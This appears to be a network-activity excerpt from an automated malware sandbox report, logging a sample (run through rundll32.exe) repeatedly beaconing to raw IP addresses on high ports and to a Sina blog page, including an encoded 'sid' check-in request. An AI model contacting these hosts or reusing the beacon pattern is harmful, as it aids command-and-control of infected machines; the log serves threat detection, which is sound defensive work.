Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: unknown TCP traffic detected without corresponding DNS query: 107.160.131.253
Source: unknown TCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknown TCP traffic detected without corresponding DNS query: 107.160.131.254
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10003F41 InternetReadFile,3_2_10003F41
Source: global traffic HTTP traffic detected: GET /u/5762479093 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET //joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWmtaWndm@ HTTP/1.1 User-Agent: Mozilla/4.0 (compatible) Host: 107.160.131.253:18659 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /u1129.html HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.56.110:18530 Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
